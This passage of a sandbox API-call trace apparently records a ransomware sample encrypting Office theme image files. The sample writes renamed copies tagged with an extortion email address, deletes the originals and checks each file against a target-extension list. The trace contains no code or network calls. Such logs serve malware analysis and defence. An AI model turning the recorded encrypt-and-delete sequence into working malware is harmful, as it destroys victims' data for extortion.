lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.300] SetEndOfFile (hFile=0x1f4) returned 1 [0045.308] CloseHandle (hObject=0x1f4) returned 1 [0045.308] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0045.309] SetEndOfFile (hFile=0x208) returned 1 [0045.309] CloseHandle (hObject=0x208) returned 1 [0045.309] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0045.310] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png")) returned 1 [0045.310] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0045.310] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0045.310] lstrlenW (lpString=".doc") returned 4 [0045.310] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.310] lstrlenW (lpString=".docx") returned 5 [0045.310] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.310] lstrlenW (lpString=".pdf") returned 4 [0045.310] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.310] lstrlenW (lpString=".xls") returned 4 [0045.310] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.310] lstrlenW (lpString=".xlsx") returned 5 [0045.310] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.310] lstrlenW (lpString=".ppt") returned 4 [0045.310] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.310] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0045.310] lstrlenW (lpString=".zip") returned 4 [0045.310] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.310] lstrlenW (lpString=".rar") returned 4 [0045.310] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.310] lstrlenW (lpString=".bz2") returned 4 [0045.310] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.310] lstrlenW (lpString=".7z") returned 3 [0045.310] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.310] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0045.310] lstrlenW (lpString=".dbf") returned 4 [0045.311] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0045.311] lstrlenW (lpString=".1cd") returned 4 [0045.311] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0045.311] lstrlenW (lpString=".jpg") returned 4 [0045.311] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0045.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0045.311] lstrlenW (lpString=".doc") returned 4 [0045.311] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.311] lstrlenW (lpString=".docx") returned 5 [0045.311] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.311] lstrlenW (lpString=".pdf") returned 4 [0045.311] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.311] lstrlenW (lpString=".xls") returned 4 [0045.311] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.311] lstrlenW (lpString=".xlsx") returned 5 [0045.311] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.311] lstrlenW (lpString=".ppt") returned 4 [0045.311] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0045.311] lstrlenW (lpString=".zip") returned 4 [0045.311] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.311] lstrlenW (lpString=".rar") returned 4 [0045.311] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.311] lstrlenW (lpString=".bz2") returned 4 [0045.311] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.311] lstrlenW (lpString=".7z") returned 3 [0045.311] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0045.311] lstrlenW (lpString=".dbf") returned 4 [0045.311] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.311] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0045.311] lstrlenW (lpString=".1cd") returned 4 [0045.311] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0045.312] lstrlenW (lpString=".jpg") returned 4 [0045.312] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.312] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0045.312] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.312] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0045.587] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=20575) returned 1 [0045.587] CloseHandle (hObject=0x1b8) returned 1 [0045.587] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png")) returned 0x20 [0045.587] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0045.587] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0045.587] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0045.587] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0045.588] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0045.588] GetLastError () returned 0x0 [0045.588] ReadFile (in: hFile=0x1b8, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x505f, lpOverlapped=0x0) returned 1 [0045.590] WriteFile (in: hFile=0x1c4, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x5060, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x5060, lpOverlapped=0x0) returned 1 [0045.592] ReadFile (in: hFile=0x1b8, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0045.592] WriteFile (in: hFile=0x1c4, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.592] SetEndOfFile (hFile=0x1c4) returned 1 [0045.592] CloseHandle (hObject=0x1c4) returned 1 [0045.592] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0045.592] SetEndOfFile (hFile=0x1b8) returned 1 [0045.593] CloseHandle (hObject=0x1b8) returned 1 [0045.593] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0045.593] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png")) returned 1 [0045.594] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0045.594] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0045.594] lstrlenW (lpString=".doc") returned 4 [0045.594] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.594] lstrlenW (lpString=".docx") returned 5 [0045.594] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.594] lstrlenW (lpString=".pdf") returned 4 [0045.594] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.594] lstrlenW (lpString=".xls") returned 4 [0045.594] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.594] lstrlenW (lpString=".xlsx") returned 5 [0045.594] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.594] lstrlenW (lpString=".ppt") returned 4 [0045.594] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.594] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0045.594] lstrlenW (lpString=".zip") returned 4 [0045.594] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.594] lstrlenW (lpString=".rar") returned 4 [0045.594] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.594] lstrlenW (lpString=".bz2") returned 4 [0045.594] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.594] lstrlenW (lpString=".7z") returned 3 [0045.594] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.594] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0045.594] lstrlenW (lpString=".dbf") returned 4 [0045.594] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.594] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0045.594] lstrlenW (lpString=".1cd") returned 4 [0045.594] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.594] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0045.594] lstrlenW (lpString=".jpg") returned 4 [0045.594] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.595] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0045.595] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0045.595] lstrlenW (lpString=".doc") returned 4 [0045.595] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.595] lstrlenW (lpString=".docx") returned 5 [0045.595] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.595] lstrlenW (lpString=".pdf") returned 4 [0045.595] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.595] lstrlenW (lpString=".xls") returned 4 [0045.595] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.595] lstrlenW (lpString=".xlsx") returned 5 [0045.595] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.595] lstrlenW (lpString=".ppt") returned 4 [0045.595] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.595] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0045.595] lstrlenW (lpString=".zip") returned 4 [0045.595] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.595] lstrlenW (lpString=".rar") returned 4 [0045.595] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.595] lstrlenW (lpString=".bz2") returned 4 [0045.595] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.595] lstrlenW (lpString=".7z") returned 3 [0045.595] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.595] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0045.595] lstrlenW (lpString=".dbf") returned 4 [0045.595] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.595] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0045.595] lstrlenW (lpString=".1cd") returned 4 [0045.595] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.595] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 76 [0045.595] lstrlenW (lpString=".jpg") returned 4 [0045.595] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.596] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0045.596] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.596] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.047] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=33277) returned 1 [0046.047] CloseHandle (hObject=0x174) returned 1 [0046.047] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png")) returned 0x20 [0046.047] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.048] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.048] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.048] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.048] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0046.063] GetLastError () returned 0x0 [0046.063] ReadFile (in: hFile=0x174, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x81fd, lpOverlapped=0x0) returned 1 [0046.126] WriteFile (in: hFile=0x1fc, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x8200, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x8200, lpOverlapped=0x0) returned 1 [0046.127] ReadFile (in: hFile=0x174, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0046.128] WriteFile (in: hFile=0x1fc, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.128] SetEndOfFile (hFile=0x1fc) returned 1 [0046.128] CloseHandle (hObject=0x1fc) returned 1 [0046.128] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.128] SetEndOfFile (hFile=0x174) returned 1 [0046.129] CloseHandle (hObject=0x174) returned 1 [0046.129] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0046.129] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png")) returned 1 [0046.129] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0046.129] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0046.130] lstrlenW (lpString=".doc") returned 4 [0046.130] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.130] lstrlenW (lpString=".docx") returned 5 [0046.130] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.130] lstrlenW (lpString=".pdf") returned 4 [0046.130] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.130] lstrlenW (lpString=".xls") returned 4 [0046.130] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.130] lstrlenW (lpString=".xlsx") returned 5 [0046.130] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.130] lstrlenW (lpString=".ppt") returned 4 [0046.130] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0046.130] lstrlenW (lpString=".zip") returned 4 [0046.130] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.130] lstrlenW (lpString=".rar") returned 4 [0046.130] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.130] lstrlenW (lpString=".bz2") returned 4 [0046.130] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.130] lstrlenW (lpString=".7z") returned 3 [0046.130] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0046.130] lstrlenW (lpString=".dbf") returned 4 [0046.130] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0046.130] lstrlenW (lpString=".1cd") returned 4 [0046.130] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0046.130] lstrlenW (lpString=".jpg") returned 4 [0046.130] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0046.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0046.130] lstrlenW (lpString=".doc") returned 4 [0046.130] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.130] lstrlenW (lpString=".docx") returned 5 [0046.131] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.131] lstrlenW (lpString=".pdf") returned 4 [0046.131] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.131] lstrlenW (lpString=".xls") returned 4 [0046.131] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.131] lstrlenW (lpString=".xlsx") returned 5 [0046.131] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.131] lstrlenW (lpString=".ppt") returned 4 [0046.131] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0046.131] lstrlenW (lpString=".zip") returned 4 [0046.131] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.131] lstrlenW (lpString=".rar") returned 4 [0046.131] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.131] lstrlenW (lpString=".bz2") returned 4 [0046.131] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.131] lstrlenW (lpString=".7z") returned 3 [0046.131] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0046.131] lstrlenW (lpString=".dbf") returned 4 [0046.131] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0046.131] lstrlenW (lpString=".1cd") returned 4 [0046.131] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0046.131] lstrlenW (lpString=".jpg") returned 4 [0046.131] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.131] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0046.131] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.131] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.132] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=5120) returned 1 [0046.132] CloseHandle (hObject=0x174) returned 1 [0046.132] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif")) returned 0x20 [0046.132] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.132] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.132] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.132] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.132] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0046.174] GetLastError () returned 0x0 [0046.174] ReadFile (in: hFile=0x174, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x1400, lpOverlapped=0x0) returned 1 [0046.176] WriteFile (in: hFile=0x1fc, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x1410, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x1410, lpOverlapped=0x0) returned 1 [0046.176] ReadFile (in: hFile=0x174, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0046.177] 